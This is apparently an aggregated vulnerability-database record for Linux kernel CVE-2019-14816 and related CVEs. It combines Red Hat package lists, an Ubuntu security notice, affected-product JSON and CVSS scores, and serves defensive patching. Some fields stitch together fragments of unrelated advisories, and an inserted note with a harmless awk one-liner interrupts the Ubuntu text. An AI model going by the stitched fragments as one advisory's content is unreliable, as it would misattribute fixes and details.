x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
ppc64: bpftool-3.10.0-1062.12.1.el7.ppc64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64.rpm perf-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm
ppc64le: bpftool-3.10.0-1062.12.1.el7.ppc64le.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-headers-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.ppc64le.rpm perf-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm
s390x: bpftool-3.10.0-1062.12.1.el7.s390x.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-1062.12.1.el7.s390x.rpm kernel-devel-3.10.0-1062.12.1.el7.s390x.rpm kernel-headers-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-1062.12.1.el7.s390x.rpm perf-3.10.0-1062.12.1.el7.s390x.rpm perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm python-perf-3.10.0-1062.12.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.s390x.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64.rpm
ppc64le: bpftool-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.ppc64le.rpm
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: kernel-3.10.0-1062.12.1.el7.src.rpm
noarch: kernel-abi-whitelists-3.10.0-1062.12.1.el7.noarch.rpm kernel-doc-3.10.0-1062.12.1.el7.noarch.rpm
x86_64: bpftool-3.10.0-1062.12.1.el7.x86_64.rpm bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-devel-3.10.0-1062.12.1.el7.x86_64.rpm kernel-headers-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-1062.12.1.el7.x86_64.rpm perf-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: bpftool-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-1062.12.1.el7.x86_64.rpm perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-1062.12.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2019-14816
https://access.redhat.com/security/cve/CVE-2019-14895
https://access.redhat.com/security/cve/CVE-2019-14898
https://access.redhat.com/security/cve/CVE-2019-14901
https://access.redhat.com/security/cve/CVE-2019-17133
https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2020 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBXjnG/NzjgjWX9erEAQiZpA/+PrziwQc9nitsDyWqtq556llAnWG2YjEK kzbq/d3Vp+7i0aaOHXNG9b6XDgR8kPSLnb/2tCUBQKmLeWEptgY6s24mXXkiAHry plZ40Xlmca9cjPQCSET7IkQyHlYcUsc9orUT3g1PsZ0uOxPQZ1ivB1utn6nyhbSg 9Az/e/9ai7R++mv4zJ7UDrDzuGPv5SOtyIcfuUyYdbuZO9OrmFsbWCRwG+cVvXJ6 q6uXlIpcWx4H7key9SiboU/VSXXPQ0E5vv1A72biDgCXhm2kYWEJXSwlLH2jJJo7 DfujB4+NSnDVp7Qu0aF/YsEiR9JQfGOOrfuNsmOSdK3Bx3p8LkS4Fd9y3H/fCwjI EOoXerSgeGjB5E/DtH24HKu1FB5ZniDJP69itCIONokq6BltVZsQRvZxpXQdmvpz hTJIkYqnuvrkv2liCc8Dr7P7EK0SBPhwhmcBMcAcPHE8BbOtEkcGzF2f2/p/CQci N0c4UhB2p+eSLq+W4qG4W/ZyyUh2oYdvPjPCrziT1qHOR4ilw9fH9b+jCxmAM7Lh wqj3yMR9YhUrEBRUUokA/wjggmI88u6I8uQatbf6Keqj1v1CykMKF3AEC5qfxwGz hk0YzSh0YK6DfybzNxcZK/skcp0Ga0vD+El/nXFI0WGXB8LsQiOUBgfp1JyAlXT6 IwzrfQ6EsXE= =mofI -----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
Enhancement(s):
-
Selective backport: perf: Sync with upstream v4.16 (BZ#1782748)
-
Please note that the RDS protocol is blacklisted in Ubuntu by default.

=========================================================================
Ubuntu Security Notice USN-4163-2
October 23, 2019
linux-lts-xenial, linux-aws vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu 14.04 ESM.
It was discovered that a race condition existed in the ARC EMAC ethernet driver for the Linux kernel, resulting in a use-after-free vulnerability. An attacker could use this to cause a denial of service (system crash). (CVE-2016-10906)
It was discovered that a race condition existed in the Serial Attached SCSI (SAS) implementation in the Linux kernel when handling certain error conditions. A local attacker could use this to cause a denial of service (kernel deadlock). (CVE-2017-18232)
It was discovered that the RSI 91x Wi-Fi driver in the Linux kernel did not handle detach operations correctly, leading to a use-after-free vulnerability. (CVE-2018-21008)
Wen Huang discovered that the Marvell Wi-Fi device driver in the Linux kernel did not properly perform bounds checking, leading to a heap overflow. (CVE-2019-14814, CVE-2019-14816)
Matt Delco discovered that the KVM hypervisor implementation in the Linux kernel did not properly perform bounds checking when handling coalesced MMIO write operations. A local attacker with write access to /dev/kvm could use this to cause a denial of service (system crash). (CVE-2019-14821)
Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel did not properly validate device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15117)
Hui Peng and Mathias Payer discovered that the USB audio driver for the Linux kernel improperly performed recursion while handling device meta data. A physically proximate attacker could use this to cause a denial of service (system crash). (CVE-2019-15118)
It was discovered that the Technisat DVB-S/S2 USB device driver in the Linux kernel contained a buffer overread. A physically proximate attacker could use this to cause a denial of service (system crash) or possibly expose sensitive information. (CVE-2019-15505)
Brad Spengler discovered that a Spectre mitigation was improperly implemented in the ptrace subsystem of the Linux kernel. A local attacker could possibly use this to expose sensitive information. (CVE-2019-15902)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: linux-image-4.4.0-1056-aws 4.4.0-1056.60 linux-image-4.4.0-166-generic 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-generic-lpae 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-lowlatency 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-e500mc 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc-smp 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-emb 4.4.0-166.195~14.04.1 linux-image-4.4.0-166-powerpc64-smp 4.4.0-166.195~14.04.1 linux-image-aws 4.4.0.1056.57 linux-image-generic-lpae-lts-xenial 4.4.0.166.145 linux-image-generic-lts-xenial 4.4.0.166.145 linux-image-lowlatency-lts-xenial 4.4.0.166.145 linux-image-powerpc-e500mc-lts-xenial 4.4.0.166.145 linux-image-powerpc-smp-lts-xenial 4.4.0.166.145 linux-image-powerpc64-emb-lts-xenial 4.4.0.166.145 linux-image-powerpc64-smp-lts-xenial 4.4.0.166.145 linux-image-virtual-lts-xenial 4.4.0.166.145
After a standard system update you need to reboot your computer to make all the necessary changes.
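The update table above pairs each binary package with the version that contains the fix, all on one line. As a small, hypothetical illustration (apt and dpkg are the real tools for querying and comparing package versions), an awk one-liner can split such a space-separated row back into name/version lines:

```shell
#!/bin/sh
# Sketch: split a space-separated "name version name version ..." row,
# like the package table in this notice, into one "name version" pair
# per line. The example row is a shortened excerpt from the table above.
line='linux-image-4.4.0-1056-aws 4.4.0-1056.60 linux-image-aws 4.4.0.1056.57'
rows=$(printf '%s\n' "$line" | awk '{ for (i = 1; i <= NF; i += 2) print $i, $(i+1) }')
printf '%s\n' "$rows"
```

This prints two lines, one per package/version pair, which is easier to feed into scripts that check installed versions.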
ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well.

7) - noarch, x86_64
Bug Fix(es):
-
patchset for x86/atomic: Fix smp_mb__{before,after}_atomic() [kernel-rt] (BZ#1772522)
-
kernel-rt: update to the RHEL7.7.z batch#4 source tree (BZ#1780322)
-
kvm nx_huge_pages_recovery_ratio=0 is needed to meet KVM-RT low latency requirement (BZ#1781157)
-
kernel-rt: hard lockup panic in during execution of CFS bandwidth period timer (BZ#1788057)
4
{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "3.16.74"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "19.04"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.1"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.5"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "a320",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.0"
},
{
"_id": null,
"model": "service processor",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.2"
},
{
"_id": null,
"model": "enterprise linux compute node eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.15"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.4.194"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.4"
},
{
"_id": null,
"model": "steelstore cloud integrated storage",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.9.194"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.75"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7"
},
{
"_id": null,
"model": "c190",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h300e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "18.04"
},
{
"_id": null,
"model": "h700e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.10"
},
{
"_id": null,
"model": "a220",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.0"
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "fas2720",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux for power big endian eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6_ppc64"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.0"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8"
},
{
"_id": null,
"model": "messaging realtime grid",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "2.0"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.20"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "enterprise linux for real time for nfv tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "3.6"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.0"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "6.0"
},
{
"_id": null,
"model": "enterprise linux for real time tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "virtualization",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "4.2"
},
{
"_id": null,
"model": "data availability services",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "14.04"
},
{
"_id": null,
"model": "enterprise linux tus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.7"
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "29"
},
{
"_id": null,
"model": "h500e",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "solidfire",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.3"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.2.17"
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux for real time",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7"
},
{
"_id": null,
"model": "h610s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "a800",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "30"
},
{
"_id": null,
"model": "enterprise linux",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "5.0"
},
{
"_id": null,
"model": "hci management node",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "a700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.4"
},
{
"_id": null,
"model": "ubuntu linux",
"scope": "eq",
"trust": 1.0,
"vendor": "canonical",
"version": "16.04"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.146"
},
{
"_id": null,
"model": "enterprise linux eus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "7.6"
},
{
"_id": null,
"model": "enterprise linux server aus",
"scope": "eq",
"trust": 1.0,
"vendor": "redhat",
"version": "8.2"
},
{
"_id": null,
"model": "leap",
"scope": "eq",
"trust": 1.0,
"vendor": "opensuse",
"version": "15.1"
},
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "3.17"
},
{
"_id": null,
"model": "fas2750",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"credits": {
"_id": null,
"data": "Ubuntu,Red Hat",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
}
],
"trust": 0.6
},
"cve": "CVE-2019-14816",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2019-14816",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.0,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14816",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "secalert@redhat.com",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"exploitabilityScore": 1.8,
"id": "CVE-2019-14816",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-14816",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "secalert@redhat.com",
"id": "CVE-2019-14816",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201908-2176",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201908-2176"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
},
{
"db": "NVD",
"id": "CVE-2019-14816"
}
]
},
"description": {
"_id": null,
"data": "There is heap-based buffer overflow in kernel, all versions up to, excluding 5.3, in the marvell wifi chip driver in Linux kernel, that allows local users to cause a denial of service(system crash) or possibly execute arbitrary code. 7) - aarch64, noarch, ppc64le\n\n3. \n\nBug Fix(es):\n\n* Kernel panic on job cleanup, related to SyS_getdents64 (BZ#1702057)\n\n* Kernel modules generated incorrectly when system is localized to\nnon-English language (BZ#1705285)\n\n* RHEL-Alt-7.6 - Fixup tlbie vs store ordering issue on POWER9 (BZ#1756270)\n\n4. 7.5) - ppc64, ppc64le, x86_64\n\n3. \n\nBug Fix(es):\n\n* Slow console output with ast (Aspeed) graphics driver (BZ#1780145)\n\n* core: backports from upstream (BZ#1794373)\n\n* System Crash on vport creation (NPIV on FCoE) (BZ#1796362)\n\n* [GSS] Can\u0027t access the mount point due to possible blocking of 